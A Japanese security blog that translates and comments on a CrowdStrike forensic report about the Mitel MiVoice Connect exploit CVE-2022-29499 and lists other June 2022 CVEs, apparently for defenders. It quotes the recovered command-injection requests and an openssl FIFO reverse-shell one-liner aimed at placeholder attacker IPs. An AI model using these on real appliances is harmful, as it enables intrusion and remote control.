Jun 28, 2022

CVE-2022-29499 Mitel MiVoice Connect in K.E.V. Catalog #3



Mitel zero-day used by hackers in suspected ransomware attack (BleepingComputer 06/24)

The exploit involves two GET requests, one sent to the device targeting a get_url parameter of a PHP file and the second generated on the device itself, causing a command injection that performs HTTP GET requests to the attackers infrastructure.

エクスプロイトには2つのGETリクエストが含まれます。1つはPHPファイルの「get_urlパラメータをターゲットとしてデバイスに送信されます。もう1はデバイス自体で生成され、攻撃者のインフラストラクチャにHTTP GETリクエストを実行するコマンドインジェクションを引き起こします。

 

The threat actors used the vulnerability to create a reverse shell by leveraging FIFO pipes on the targeted Mitel device, sending outbound requests from within the compromised network.

脅威者は、この脆弱性を利用して、標的となるMitelデバイスFIFOパイプを活用することでリバースシェルを作成し、侵害されたネットワーク内からアウトバウンドリクエストを送信しました。

 

With the reverse shell established, the intruder created a web shell (pdf_import.php) and downloaded a reverse proxy tool called Chisel, to reduce the chances of detection while moving laterally in the network.

リバースシェルを確立した侵入者は、ウェブシェル(pdf_import.php)を作成し、「Chiselというリバースプロキシツールをダウンロードして、ネットワーク内で横方向に移動しながら検出される可能性を低くしました。

 

Crowdstrike also mentions anti-forensic efforts from the threat actor, who attempted to delete all files in the compromised devices using the "dd" overwrite command. However, the analysts could retrieve evidence from the /tmp partition and recover HTTP access logs.

また、クラウドストライクは、脅威者が「dd上書きコマンドを使用して、侵害されたデバイスのすべてのファイルを削除しようとしたアンチフォレンジックの取り組みについても言及しています。しかし、アナリストは、/tmp パーティションから証拠を取得し、HTTP アクセスログを復元することができました。

 

While no official patch has been released, Mitel addressed it on April 19, 2022, by releasing a remediation script for MiVoice Connect versions 19.2 SP3 and earlier and R14.x and earlier.

正式なパッチはリリースされていないが、Mitel2022419日、MiVoice Connectバージョン19.2 SP3以前およびR14.x以前向けの修復スクリプトを公開し、これに対処している。

 

According to security researcher Kevin Beaumont, there are over 21,000 publicly accessible Mitel devices online, with the majority located in the United States, followed by the United Kingdom.

セキュリティ研究者のKevin Beaumont氏によると、一般にアクセス可能なMitelデバイスはオンラインで21000台以上あり、その大半は米国にあり、次いで英国にあるとのことです。

●研究者、ビューモント氏の同デバイス稼働地域調査のtweet

BleepingComputer has contacted CrowdStrike asking why they believe it was a ransomware attack and will update this article with their response.

BleepingComputerCrowdStrikeに、なぜこの攻撃がランサムウェア攻撃であると考えるかについて問い合わせ、その回答とともにこの記事を更新する予定です。


overview of cve-2022-29499 (avertium)

The attacker attempted to go undetected by performing anti-forensic techniques on the VoIP appliance - renaming the binary to “memdump”. The device that was observed by Crowdstrike was a Linux-based Mitel VoIP appliance sitting on the network perimeter, where EDR software for the device was highly limited. 
攻撃者は、VoIPアプライアンスに対してアンチフォレンジック技術を実行し、バイナリを「memdumpにリネームすることで検知されないようにしようとしました。クラウドストライクが観測したデバイスは、LinuxベースのMitel VoIPアプライアンスで、ネットワークの境界に置かれており、デバイス用のEDRソフトウェアは非常に制限されていました。

※、EDRで「アクセスを厳密に制限していた」とは書かれていない。EDRは導入していない機器が多かったという事か?と思ってしまった。これは一次情報のクラウドストライク記事を読むと「アベイラブル」という言葉が使われていて、「同様環境で動作可能な対策ソフトは入手も稼働も困難である」と分かる。悩んだ時は一次情報を見よう。


 


CVE-2022-29499 Mitel MiVoice Connect in K.E.V. Catalog #2

どうやら一次情報は、クラウドストライクの以下の記事のようだ。抜粋して日本語化した。


The Call Is Coming from Inside the House: CrowdStrike Identifies Novel Exploit in VOIP Appliance (06/23)

l  CrowdStrike Services recently performed an investigation that identified a compromised Mitel VOIP appliance as the threat actor’s entry point.

l  The threat actor performed a novel remote code execution exploit on the Mitel appliance to gain initial access to the environment.

l  CrowdStrike identified and reported the vulnerability to Mitel, and CVE-2022-29499 was created.

l  The threat actor performed anti-forensic techniques on the VOIP appliance in an attempt to hide their activity.

²  CrowdStrike Servicesは最近、侵害されたMitel VOIPアプライアンスを脅威要因の侵入口として特定する調査を実施しました。

²  この脅威者は、環境への初期アクセスを得るために、Mitelプライアンス上で新しいリモートコード実行エクスプロイトを実行しました。

²  CrowdStrikeは、この脆弱性を特定し、Mitelに報告し、CVE-2022-29499が作成されました。

²  脅威者は、その活動を隠すために、VOIPアプライアンス上でアンチフォレンジック技術を実行しました。

 

Background

CrowdStrike Services recently investigated a suspected ransomware intrusion attempt. The intrusion was quickly stopped through the customer’s efforts and those of the CrowdStrike Falcon Complete™ managed detection and response (MDR) team, which was supporting this customer’s environment. CrowdStrike determined that all of the identified malicious activity had originated from an internal IP address associated with a device that did not have the CrowdStrike Falcon® sensor installed on it. Further investigation revealed that this source device was a Linux-based Mitel VOIP appliance sitting on the network perimeter; the availability of supported security or endpoint detection and response (EDR) software for these devices is highly limited.

CrowdStrike Servicesは最近、ランサムウェアによる侵入の疑いがある事例を調査しました。この侵入は、お客様の努力と、このお客様の環境をサポートしていたCrowdStrike Falcon Complete™マネージド検知・対応(MDRチームの努力により、すぐに阻止されました。CrowdStrikeは、特定された悪意のある活動のすべてが、CrowdStrike Falcon®センサーがインストールされていないデバイスに関連する内部IPアドレスから発信されていることを突き止めたのです。さらに調査を進めると、この発信元のデバイスは、ネットワーク境界に設置されているLinuxベースのMitel VOIPアプライアンスであることが判明しました。これらのデバイスに対応するセキュリティまたはエンドポイント検出および応答(EDR)ソフトウェアは、非常に限定されています。

 

The device was taken offline and imaged for further analysis, leading to the discovery of a novel remote code execution exploit used by the threat actor to gain initial access to the environment. Thanks to close and immediate work with the Mitel product security incident response team (PSIRT) team, this was identified as a zero-day exploit and patched. The vulnerability was assigned CVE-2022-29499, and the associated security advisory can be found here.

このデバイスはオフラインにされ、さらなる分析のために画像化されました。その結果、脅威者が環境への最初のアクセスを得るために使用した新しいリモートコード実行エクスプロイトが発見されました。Mitel製品のセキュリティインシデント対応チーム(PSIRTチームとの緊密かつ迅速な連携により、これはゼロデイエクスプロイトとして特定され、パッチが適用されました。この脆弱性にはCVE-2022-29499が割り当てられ、関連するセキュリティアドバイザリはこちらでご覧いただけます。

 

Discovery and Anti-Forensic Techniques

After tracing threat actor activity to an IP address assigned to the Mitel MiVoice Connect VOIP appliance, CrowdStrike received a disk image of the Linux system and began analysis. CrowdStrike’s analysis identified anti-forensic techniques that were performed by the threat actor on the Mitel appliance in an attempt to hide their activity. Given the close proximity in time between the earliest and most recent dates of activity, it was likely that the threat actor attempted to wipe their activity on the Mitel appliance after Falcon Complete detected their activity and prevented them from moving laterally.

脅威者の活動をMitel MiVoice Connect VOIPアプライアンスに割り当てられたIPアドレスまで追跡した後、CrowdStrikeLinuxシステムのディスクイメージを受け取り、分析を開始しました。CrowdStrikeの分析により、脅威者がその活動を隠すためにMitelアプライアンス上で実行したアンチフォレンジック技術が特定されました。活動の最も古い日付と最も新しい日付の間の時間が近いことから、Falcon Completeが彼らの活動を検知し、横方向への移動を阻止した後、脅威行為者はMitelアプライアンス上の活動を消去しようとした可能性が高いと考えられます。

 

Although the threat actor deleted all files from the VOIP device’s filesystem, CrowdStrike was able to recover forensic data from the device. This included the initial undocumented exploit used to compromise the device, the tools subsequently downloaded by the threat actor to the device, and even evidence of specific anti-forensic measures taken by the threat actor.

脅威者はVOIPデバイスのファイルシステムからすべてのファイルを削除しましたが、CrowdStrikeはデバイスからフォレンジックデータを回復することができました。これには、デバイスを侵害するために使用された最初の文書化されていないエクスプロイト、脅威者がその後デバイスにダウンロードしたツール、さらには脅威者が行った特定のアンチフォレンジック対策の証拠も含まれていました。

 

Beyond removing files, the threat actor attempted to overwrite free space on the device. A recovered nohup.out file (generated by running a command via nohup) contained the following:

脅威者は、ファイルを削除するだけでなく、デバイスの空き領域を上書きすることも試みました。復元されたnohup.outファイル(nohupによるコマンド実行で生成)には、次のような内容が含まれていました。

 

rm: cannot remove '/cf/swapfile': Operation not permitted

dd: error writing '/tmp/2': No space left on device

10666+0 records in

10665+0 records out

11183382528 bytes (11 GB) copied, 81.3694 s, 137 MB/s

 

The messages in the recovered file indicated two things. First, the error for the rm1 command failing to delete the swap file demonstrated that rm was used as part of the nohup command. The original rm command run via nohup was likely designed to delete all files, but failed on the swapfile due to it being active, resulting in the error message.

復元されたファイルのメッセージから、2つのことがわかりました。まず、スワップファイルの削除に失敗したrm1コマンドのエラーは、rmnohupコマンドの一部として使用されていることを実証しています。nohupを介して実行されたオリジナルのrmコマンドは、すべてのファイルを削除するように設計されていたようですが、スワップファイルがアクティブであったために失敗し、このエラーメッセージが表示されたものと思われます。

 

Second, the threat actor used the dd2 command to attempt to create a file (/tmp/2) that, because of its size, would overwrite all of the free space on the device (and indeed did, based on the dd error message “No space left on device”). This anti-forensic measure would have been taken to prevent recovery of data deleted via the initial rm command. However, in this instance, /tmp was on a separate partition than that storing HTTP access logs. While the log files were also deleted via the rm command, the free space that contained their contents was not overwritten, allowing the file contents to be recovered. These recovered HTTP access logs included evidence of the exploit used to compromise the device.

次に、脅威者は dd2 コマンドを使用して、そのサイズからデバイス上のすべての空き領域を上書きするファイル(/tmp/2)を作成しようとしました(dd のエラーメッセージ "No space left on device" から、実際に上書きされました)。このフォレンジック対策は、最初のrmコマンドで削除されたデータの復元を防ぐために行われたはずです。しかし、今回の場合、/tmpHTTPアクセスログを保存しているパーティションとは別のパーティションにありました。HTTPアクセスログもrmコマンドで削除されましたが、その内容を含む空き領域は上書きされなかったため、ファイルの内容を復元することができました。復元されたHTTPアクセスログには、不正侵入の痕跡が含まれていました。

 

Exploit Details

The exploit involved two GET requests. The first request targeted a get_url parameter of a php file, populating the parameter with a URL to a local file on the device. This caused the second request to originate from the device itself, which led to exploitation. This first request was necessary because the actual vulnerable URL was restricted from receiving requests from external IP addresses. By first targeting the get_url parameter, the actual exploit request to the vulnerable page came from the local system.

この脆弱性は、2つのGETリクエストを含んでいます。最初のリクエストは、PHPファイルのget_urlパラメータをターゲットとし、パラメータにデバイス上のローカルファイルへのURLを入力しました。これにより、2つ目のリクエストはデバイス自体から発信されることになり、悪用されることになりました。実際の脆弱性のあるURLは、外部IPアドレスからのリクエストの受信が制限されているため、この最初のリクエストが必要でした。最初にget_urlパラメータをターゲットにすることで、脆弱性ページへの実際のエクスプロイトリクエストは、ローカルシステムから来ることになりました。

 

Note that the threat actor IP addresses have been replaced with invalid IPs 1.1.256.1 and 2.2.256.2 below. The URL-encoded portion at the end of the request below decodes to $PWD|sh|?.

なお、脅威の主体であるIPアドレスは、以下の無効なIPである1.1.256.1および2.2.256.2に置き換えられています。以下のリクエストの末尾にあるURLエンコードされた部分は、$PWD|sh|? です。

 

Request #1:

1.1.256.1 - - [01/Mar/2022:01:25:17 -TZ] "GET /scripts/vtest.php?get_url=http://127.0.0.1/ucbsync.php%3fcmd=syncfile:db_files/favicon.ico:2.2.256.2/%24%50%57%44%7c%73%68%7c%3f HTTP/1.1" 200 40

 

The second request included command injection that would cause the system to perform an HTTP GET request to attacker-controlled infrastructure, and then pipe the results of the request locally to sh.3 This would allow execution of whatever commands were stored on the attacker’s server at the requested URL. This vulnerability was caused by the PHP file in question splitting up the parameters for the syncfile command, one of which would subsequently be used by the appliance in a curl command. Because the request came from localhost — by first sending the request to the file with the get_url parameter — it was allowed. The request is shown below.

2つ目のリクエストには、攻撃者が管理するインフラへのHTTP GETリクエストを実行し、リクエストの結果をローカルにshパイプするコマンドインジェクションが含まれていました3これにより、攻撃者のサーバーに保存されているコマンドであれば、リクエストしたURLで実行できるようになります。この脆弱性は、問題の PHP ファイルが syncfile コマンドのパラメータを分割し、そのうちの 1 つがアプライアンスによって curl コマンドで使用されることによって発生します。リクエストはローカルホストから来るので、最初に get_url パラメータでファイルにリクエストを送信することで、許可されました。リクエストは以下のとおりです。

 

Request #2:

127.0.0.1 - - [01/Mar/2022:01:25:17 -TZ]  "GET /ucbsync.php?cmd=syncfile:db_files/favicon.ico:2.2.256.2/$PWD|sh|? HTTP/1.0" 200 -

 

In addition to recovering the logs, CrowdStrike recovered the contents of two outbound HTTP requests from the appliance to the attacker’s infrastructure. These outbound requests were both caused by the second request shown above. The responses to the outbound requests were also recovered, which demonstrated that the attacker used the exploit to create a reverse shell.

ログの復元に加え、CrowdStrikeはアプライアンスから攻撃者のインフラへの2つのアウトバウンドHTTPリクエストの内容も復元しました。これらのアウトバウンドリクエストは、両方とも上記の2番目のリクエストによって引き起こされたものでした。このリクエストに対するレスポンスも復元され、攻撃者がリバースシェルを作成するためにこのエクスプロイトを使用したことがわかりました。

 

The first outbound request returned valid json related to the application to reach the vulnerable section of code.

最初のアウトバウンドリクエストは、コードの脆弱なセクションに到達するために、アプリケーションに関連する有効なjsonを返しました。

 

Outbound request and response #1:

GET /$PWD|sh|?/ucbsync.php?cmd=manifest HTTP/1.1

Host: 2.2.256.2

Accept: */*

HTTP/1.0 200 OK

Server: SimpleHTTP/0.6 Python/3.8.10

Date: Tue, 01 Mar 2022 01:25:17 GMT

Content-type: text/html

{"db_files":[{"name":"exmaple0.jpg","size":55318,"date":000000000},{"name":"default_logo.jpg","size":4181,"date":0000000000},{"name":"favicon.ico","size":4364,"date":0000000000},{"name":"example1.jpg","size":73553,"date":0000000000},{"name":"example1.jpg","size":35299,"date":0000000000},{"name":"example2.jpg","size":58617,"date":0000000000},{"name":"default_banner.jpg","size":3148,"date":0000000000},{"name":"example2.jpg","size":63954,"date":0000000000},{"name":"example2.jpg","size":48666,"date":0000000000},{"name":"example3.jpg","size":65224,"date":0000000000},{"name":"example3.jpg","size":39322,"date":0000000000},{"name":"example4.jpg","size":34328,"date":0000000000},{"name":"example5.jpg","size":41095,"date":0000000000},{"name":"example6.jpg","size":43450,"date":0000000000},{"name":"example5.jpg","size":52095,"date":0000000000},{"name":"example7.jpg","size":8331,"date":0000000000}]}

 

The second outbound request showed the remote execution in action. The following recovered outbound GET request to /shoretel/wc2_deploy (hosted on the threat actor’s external infrastructure) included the payload in its response: an SSL-enabled reverse shell created via the mkfifo command and openssl s_client.

2番目のアウトバウンドリクエストは、リモート実行の動作を示していました。次の/shoretel/wc2_deployへの回復したアウトバウンドGETリクエスト(脅威者の外部インフラでホストされている)は、そのレスポンスにペイロードを含んでいます。

 

Outbound request and response #2:

GET //shoretel/wc2_deploy HTTP/1.1

User-Agent: curl/7.29.0

Host: 2.2.256.2

Accept: */*

HTTP/1.0 200 OK

Server: SimpleHTTP/0.6 Python/3.8.10

Date: Tue, 01 Mar 2022 01:25:17 GMT

Content-type: text/html

mkfifo /tmp/.svc_bkp_1; /bin/sh -i < /tmp/.svc_bkp_1 2>&1 | openssl s_client -quiet -connect 2.2.256.2:443 > /tmp/.svc_bkp_1; rm /tmp/.svc_bkp_1

 

In other words, the threat actor had a webserver (via the Python SimpleHTTP module) running on infrastructure they controlled. On this webserver was a file named wc2_deploy that contained the mkfifo command shown above. Because the threat actor’s exploit request involved reaching out to this URL and piping the response to sh, this would cause the reverse shell command to be executed upon exploitation.

つまり、この脅威者は、彼らがコントロールするインフラストラクチャ上でWebサーバ(Python SimpleHTTPモジュール経由)を実行していたのです。このWebサーバーには、上記のmkfifoコマンドを含むwc2_deployという名前のファイルがありました。脅威者の悪用リクエストは、このURLにアクセスし、そのレスポンスをshにパイプするため、悪用されるとリバースシェルコマンドが実行されることになります

 

Leveraging first in, first out (FIFO) pipes is a common technique to create a reverse shell. Often, shells created in this manner will use netcat instead of openssl s_client, but the functionality is the same, except that openssl s_client will use ssl and netcat will typically be plaintext.

先入れ先出し(FIFO)パイプを活用することは、リバースシェルを作成するための一般的な手法です。この方法で作成されたシェルは、しばしば openssl s_client の代わりに netcat を使用しますが、openssl s_client  ssl を使用し、netcat が通常プレーンテキストであることを除いて、機能は同じです。

 

Post-Exploitation Activity

Once the reverse shell was established, the threat actor created what appeared to be a webshell named pdf_import.php. The contents of pdf_import.php were not recovered; however, it was not a standard file name for the device, and a recovered log file included a POST request to the file that originated from the same IP address that the exploit requests originated from.

リバースシェルが確立されると、脅威者はpdf_import.phpという名前のウェブシェルと思われるものを作成しました。pdf_import.phpの内容は復元されていませんが、このデバイスの標準的なファイル名ではなく、復元されたログ ファイルには、エクスプロイト リクエストの発信元と同じIPアドレスから発信された当該webshellファイルへのPOST リクエストが含まれていました。

 

1.1.256.1 - - [1/Mar/2022:06:36:04 -0500] "POST /vhelp/pdf/pdf_import.php HTTP/1.1" 200 2

 

The threat actor also downloaded the tunneling/proxy tool Chisel onto the VOIP appliance, renamed it memdump and executed it. This binary acted as a reverse proxy to allow the threat actor to pivot further into the environment via the VOIP device. The execution of Chisel, as well as the POST request to pdf_import.php, both directly corresponded with malicious activity detected and blocked by Falcon Complete on internal devices, suggesting that the threat actor used both tools to attempt to move laterally into the environment.

また、脅威者は、トンネル/プロキシツールであるChiselVOIPアプライアンスにダウンロードし、memdumpに名前を変えて実行しました。このバイナリはリバースプロキシとして機能し、脅威者は VOIP デバイスを経由してさらに環境内に侵入することができます。Chiselの実行とpdf_import.phpへのPOSTリクエストは、どちらも内部デバイス上でFalcon Completeによって検出、ブロックされた悪意のある活動と直接対応しており、脅威者が両方のツールを使用して環境内に横方向に移動しようとしたことが示唆されます。

 

Conclusion

Timely patching is critical to protect perimeter devices. However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant. That’s why it’s crucial to have multiple layers of defense, such as Falcon Complete MDR, which performs threat monitoring and remediation of malicious activity 24/7. Critical assets should be isolated from perimeter devices to the extent possible. Ideally, if a threat actor compromises a perimeter device, it should not be possible to access critical assets via “one hop” from the compromised device. In particular, it’s critical to isolate and limit access to virtualization hosts or management servers such as ESXi and vCenter systems as much as possible. This can involve jump-boxes, network segmentation and/or multifactor authentication (MFA) requirements.

境界デバイスを保護するためには、タイムリーなパッチ適用が重要です。しかし、脅威者が文書化されていない脆弱性を悪用した場合、適時のパッチ適用が無意味になります。だからこそ、脅威の監視と悪意のある活動の修復を24時間365日行うFalcon Complete MDRのような、複数の防御層を持つことが極めて重要なのです。重要な資産は、可能な限り境界デバイスから隔離されるべきです。理想的には、脅威者が境界のデバイスを侵害した場合、侵害されたデバイスから「ワンホップ」で重要な資産にアクセスすることはできないようにすべきです。特に、ESXivCenterなどの仮想化ホストや管理サーバへのアクセスは、可能な限り隔離し制限することが重要です。これには、ジャンプボックス、ネットワークのセグメンテーション、多要素認証(MFAなどが必要です。

 

Having an up-to-date and accurate asset inventory is also critically important, as you can’t protect something if you don’t know it exists. In addition, it’s important to ensure all service accounts are managed and accounted for, and that the capability exists to detect abnormal account usage. CrowdStrike Falcon Identity Protection can provide such insight by alerting on stale account usage as well as when accounts are associated with abnormal source or destination systems — and even forcing MFA challenges for users accessing critical assets.

また、最新かつ正確な資産目録を作成することも、非常に重要です。さらに、すべてのサービスアカウントが管理され、説明されていること、そしてアカウントの異常な使用を検出する機能があることを確認することが重要です。CrowdStrike Falcon Identity Protectionは、古いアカウントの使用や、アカウントが異常な送信元または送信先システムに関連付けられている場合、さらには重要な資産にアクセスするユーザーに対してMFA課題を強制する場合などにアラートを出すことによって、このような洞察を提供することが可能です。

 

CVE-2022-29499 Mitel MiVoice Connect in K.E.V. Catalog

今回は、KNOWN EXPLOITED VULNERABILITIES CATALOG にも6/27付けで掲載されている、MitelVoIP関連製品の脆弱性 CVE-2022-29499 について、以下、情報源ごとに引用し、日本語訳と私のコメント(※)を記す。

 

 

CVE-2022-29499 (NIST)

The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. The Service Appliances are SA 100, SA 400, and Virtual SA.

Mitel MiVoice Connect 19.2 SP3 までの Service Appliance コンポーネントは、不正なデータ検証のため、リモートでコードが実行される可能性があります。サービスアプライアンスは、SA 100SA 400、およびVirtual SAです。

NIST: NVD  Base Score:  9.8 CRITICAL

 

Vender Advisory

Mitel has provided a script for remediation. Customers are advised to apply the available remediation.

Customers are advised to review the product Security Bulletin ID: 22-0002-001. For additional information, contact Product Support.

Mitelは、修復のためのスクリプトを提供しています。お客様は、利用可能な改善策を適用することをお勧めします。

お客様は、製品のセキュリティ情報ID: 22-0002-001を確認することをお勧めします。その他の情報については、製品サポートにお問い合わせください。

 

※、本件に気づいたきっかけは次のボッドキャストである。


CYBER SECURITY TODAY IT World Canada

Organizations turn to voice-over-IP phone systems as a way of saving money. However, if these systems arent properly protected they could be an entry point into internet-connected systems.

Two lessons to IT staff: First, security updates on any internet-connected device on your networks — not just servers and desktops — have to be patched as soon as possible. Second any internet-connected device — including VoIP phone systems — must have anti-virus, anti-malware or firewall protection.

企業は、コスト削減のためにVoIP電話システムを導入しています。しかし、これらのシステムが適切に保護されていない場合、インターネットに接続されたシステムへの侵入口となる可能性があります。
...

ITスタッフへの2つの教訓。第一に、サーバーやデスクトップだけでなく、ネットワーク上のあらゆるインターネット接続機器のセキュリティ・アップデートは、できるだけ早く適用する必要があります。第二に、VoIP電話システムを含むインターネット接続機器には、アンチウイルス、アンチマルウェア、ファイアウォールなどによる保護が必要である。  

 

※あとがき「専門域、英語ポッドキャストのすすめ」

日本のITエンジニアの方で、「海外のエンジニアとは、通訳を介している」という方は居られるだろうか? 日本の一般人と話すと、技術用語が伝わっているか心配になるくらい、普段は専門的な世界で専門用語で語り合っているなら、そろそろ海外の方にも自分の言葉で伝えよう。

このポッドキャスターのHowardのゆっくり目の話し方とアクセントは、とても聞きやすい。「あ、実際には、こんな表現なのか」との気づきや、「これ使える表現だね」といったお気に入りは、口の中でモゴモゴ反芻してみよう。少しづつものにできるはずだ。

ここで私の経験を話すと、英会話習得のコツは楽器演奏習得に似ていると思う。

  1. 難しいフレーズを弾けるようになると、難しいフレーズをもっと正確に聞き取れるようになる。すると益々上手に弾けるようになる。
  2. 聞き取れなかった箇所は、スクリプトで確認できる(リンク参照)。和製英語に慣れてしまった耳を、本来の言い方・発音に慣れるまで聴きこんでみよう。
  3. リズムも重要だ。使い慣れた単語も、それ以外の単語も同じ一定のテンポだと聞きやすい。ネイティブの話し方には独特のテンポ・リズムがあるように感じる。そのテンポ・リズムを楽しもう。

これらの良い循環を生み出して、ビジネスシーンで活用するには、Howardの綺麗な発音と丁度よい速度がピッタリだと思う。



※、他の記事も読みたくなり、色々読み比べてみた(続く)

Jun 26, 2022

Vulnerability Summary for the Week of June 6, 2022, Severity Not Yet Assigned 抜粋

はじめに

先日、「出典」のHigh Vulnerabilities を取り上げたが、同発表には、Severity Not Yet Assignedとして相当数が挙がっていた。今回は、それらを羅列し、幾つかピックアップして内容説明する。


Primary Vendor -- Product

0day.today -- opennetadmin, ajenti -- ajenti, aleksis -- aleksis-core, alibaba -- fastjson
apache -- dubbo

以上の内容は割愛します。


apache -- http_server   

以下、8個の脆弱性が挙がっていた。今日現在では既にSeverityが割り当てられている。

CVE-2022-28615
Apache HTTP Server 2.4.53 and earlier may crash or disclose information due to a read beyond bounds in ap_strcmp_match() when provided with an extremely large input buffer. While no code distributed with the server can be coerced into such a call, third-party modules or lua scripts that use ap_strcmp_match() may hypothetically be affected.

 Apache HTTP Server 2.4.53 以前のバージョンでは、非常に大きな入力バッファが提供された場合、 ap_strcmp_match() の境界を越えた読み込みによりクラッシュしたり情報を公開したりする可能性があります。サーバで配布されているどのコードもこのような呼び出しに強制されることはありませんが、 ap_strcmp_match() を使用するサードパーティモジュールまたは lua スクリプトは、仮想的に影響を受ける可能性があります。

NIST: NVD Base Score:  9.1 CRITICAL 

ベンダーアドバイザリーによると、新しいバージョンにアップデートすれば良い。 

CVE-2022-26377
NIST: NVD Base Score:  7.5 HIGH 

ベンダーアドバイザリーによると、新しいバージョンにアップデートすれば良い。 

CVE-2022-28614

NIST: NVD Base Score:  5.3 MEDIUM 

CVE-2022-28330

NIST: NVD Base Score:  5.3 MEDIUM 

CVE-2022-31813
Apache HTTP Server 2.4.53 and earlier may not send the X-Forwarded-* headers to the origin server based on client side Connection header hop-by-hop mechanism. This may be used to bypass IP based authentication on the origin server/application.
Apache HTTP Server 2.4.53 以前のバージョンでは、クライアント側の Connection ヘッダーの hop-by-hop メカニズムに基づき、X-Forwarded-* ヘッダーをオリジンサーバーに送信しない場合があります。これは、オリジンサーバ/アプリケーションのIPベースの認証を回避するために使用される可能性があります。


NIST: NVD Base Score:  9.8 CRITICAL Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
つまりベクターは、次の通り
攻撃元区分(AV:Attack Vector) = ネットワーク(N)
攻撃条件の複雑さ(AC:Attack Complexity) = 低(L)
必要な特権レベル(PR:Privileges Required) = 不要(N)
ユーザ関与レベル(UI:User Interaction) = 不要(N)
ベンダーアドバイザリーによると、新しいバージョンにアップデートすれば良い。
※X-Forwarded-For (XFF)は、squidの場合だと、組織内IPを上位プロキシや外部Webサーバに渡す機能である。外部を意識する場合は、内部のIPの秘匿の為に使う。アクセス制御目的で、apacheでX-Forwarded-* を使うのはポピュラーなのだろうか? ベクター値は危険そうだが、実環境で影響あるのは限られているのではないか? それがベンダーアドバイザリーにはには"Low"と記されている根拠かもしれない。評価の難しいところである。以上、私が事例把握しないまま、推測しているに過ぎないので、apacheの他の脆弱性対策も含めてアップデートするに越した事はない。 

CVE-2022-30522
NIST: NVD Base Score:  7.5 HIGH 
ベンダーアドバイザリーによると、新しいバージョンにアップデートすれば良い。 


CVE-2022-29404

NIST: NVD  Base Score:  7.5 HIGH 


atlassian -- multiple_server, avantune -- genialcloud_proj, axigen -- mobile_webmail, axiomatic_systems -- bento4, axiomatic_systems -- bento4
axiomatic_systems -- bento4_mp4dump, axios_italia -- axios_re, axios_italia -- axios_re, bbge -- netwave_ip, brandbugle -- brandbugle
caphyon_ltd -- advanced_installer

carrier -- multiple_products         

クリティカル三つを含む、8つの脆弱性が挙がっている。中でも一番スコアが高いのは以下のもの。


CVE-2022-31481
An unauthenticated attacker can send a specially crafted update file to the device that can overflow a buffer. This vulnerability impacts products based on HID Mercury Intelligent Controllers LP1501, LP1502, LP2500, LP4502, and EP4502 which contain firmware versions prior to 1.302 for the LP series and 1.296 for the EP series. The overflowed data can allow the attacker to manipulate the “normal” code execution to that of their choosing. An attacker with this level of access on the device can monitor all communications sent to and from this device, modify onboard relays, change configuration files, or cause the device to become unstable.

認証されていない攻撃者が、特別に細工されたアップデートファイルをデバイスに送信することで、バッファーをオーバーフローさせることができます。この脆弱性は、HID Mercury Intelligent Controllers LP1501, LP1502, LP2500, LP4502, EP4502 をベースにした製品で、LP シリーズは 1.302, EP シリーズは 1.296 より前のファームウェアバージョンを含んでいる製品に影響します。オーバーフローしたデータにより、攻撃者は「通常の」コード実行を任意のものに操作することができます。このレベルのアクセス権を持つ攻撃者は、このデバイスに送受信されるすべての通信を監視し、オンボードリレーを変更し、設定ファイルを変更し、デバイスを不安定にさせることができます。

CNA:  Carrier Global Corporation Base Score:  10.0 CRITICAL 


chshcms -- cscms, churchcrm -- churchcrm, cla-assistant -- cla-assistant, cms_made_simple -- cms_made_siple, containerd -- containerd, convert-svg-core -- convert-svg-core, convert-svg-core -- convert-svg-core, cookiecutter -- cookiecutter, corehr -- core_portal, couchbase -- sync_gateway, cyberthoth -- fast_food_order_system


d-link -- dir-890L  

CVE-2022-29778

** UNSUPPORTED WHEN ASSIGNED ** D-Link DIR-890L 1.20b01 allows attackers to execute arbitrary code due to the hardcoded option Wake-On-Lan for the parameter 'descriptor' at SetVirtualServerSettings.php.

** UNSUPPORTED WHEN ASSIGNED ** D-Link DIR-890L 1.20b01 では、攻撃者が SetVirtualServerSettings.php のパラメータ 'descriptor' でハードコードされたオプション Wake-On-Lan により、任意のコードを実行することが可能です。

NIST: NVD  Base Score:  8.8 HIGH 

※ 当該製品はWi-Fiルータのようだ。すでに exploitが発表されている。以前、廉価な品揃えの同社を知ったのだが、ベンダーアドバイザリーには2021以降のupdate記事が無い。私だったら購入リストの順位はずっと下にしたくなる。


dell -- supportassist_client_consumer   

全部で4件の脆弱性に今日現在ではSeverityが割り当てられている。Critical 1件、High 3件。スコア最高案件は以下の通り。


CVE-2022-29095
Dell SupportAssist Client Consumer versions (3.10.4 and prior) and Dell SupportAssist Client Commercial versions (3.1.1 and prior) contain a cross-site scripting vulnerability. A remote unauthenticated malicious user could potentially exploit this vulnerability under specific conditions leading to execution of malicious code on a vulnerable system.
NIST: NVD Base Score:  9.6 CRITICAL  Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R

Dell SupportAssist Client Consumer バージョン (3.10.4 およびそれ以前) および Dell SupportAssist Client Commercial バージョン (3.1.1 およびそれ以前) には、クロスサイトスクリプティングの脆弱性が存在します。この脆弱性を利用すると、遠隔地にいる認証されていない悪意のあるユーザが、特定の条件下で、脆弱性のあるシステム上で悪意のあるコードを実行される可能性があります

CNA:  Dell Base Score:  8.3 HIGH  Vector:  CVSS:3.1/AV:N/AC:H/PR:N/UI:R

※ 攻撃元区分(AV:Attack Vector) = ネットワーク(N)、攻撃条件の複雑さ(AC:Attack Complexity)で、「高い(H)」とするDellと、「低(L)い」とするNISTとの見解の相違がある。ユーザ関与レベル(UI:User Interaction) = 要(R)。つまり、遠隔の攻撃者が犠牲者にリンクを踏ませるなどして、結果的に悪意のコードの実行が可能になるという事か。この際に、NIST見解では、攻撃の成立条件は複雑でない、と。  


その他の製品、続き 

discourse -- discourse, django-s3file -- django-s3file, dolibarr -- dolibarr


drupal -- saml_sp_2.0_single_sign_on_-_saml_service_provide

CVE-2022-26493

Multiple vulnerabilities vulnerability in Drupal SAML SP 2.0 Single Sign On (SSO) - SAML Service Provider in certain non-default configurations allow a malicious user to login as any chosen user. The vulnerability is mitigated by the module's default settings which require the options "Either sign SAML assertions" and "x509 certificate". This issue affects: Drupal SAML SP 2.0 Single Sign On (SSO) - SAML Service Provider 8.x version 8.x-2.24 and prior versions; 7.x version 7.x-2.57 and prior versions.
